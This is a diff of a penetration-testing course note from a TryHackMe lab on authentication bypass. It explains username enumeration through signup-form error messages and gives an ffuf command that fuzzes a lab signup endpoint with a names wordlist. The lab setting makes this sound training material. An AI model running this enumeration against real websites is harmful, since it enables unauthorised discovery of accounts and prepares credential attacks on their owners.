clydebuilt1974/TryHackMe/Junior Penetration Tester/Introduction to Web Hacking/Authentication Bypass.md

 * Website error messages are great resource for collating information to build list of valid usernames.

 1. Go to the fake IT Support website’s signup page.
-2. Use the form to create a new user account.
+2. Use form to create a new user account.
-3. Enter the username 'admin' and fill in the other form fields with fake information.
+3. Enter username 'admin' and fill in the other form fields with fake information.
-4. This produces an 'An account with this username already exists' error.
+4. Produces "An account with this username already exists" error.
-5. Use the existence of the error message to produce a list of valid usernames already signed up on the system by using ffuf.
+5. Use existence of the error message to produce list of valid usernames already signed up on the system.
 ```
 ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"
 ```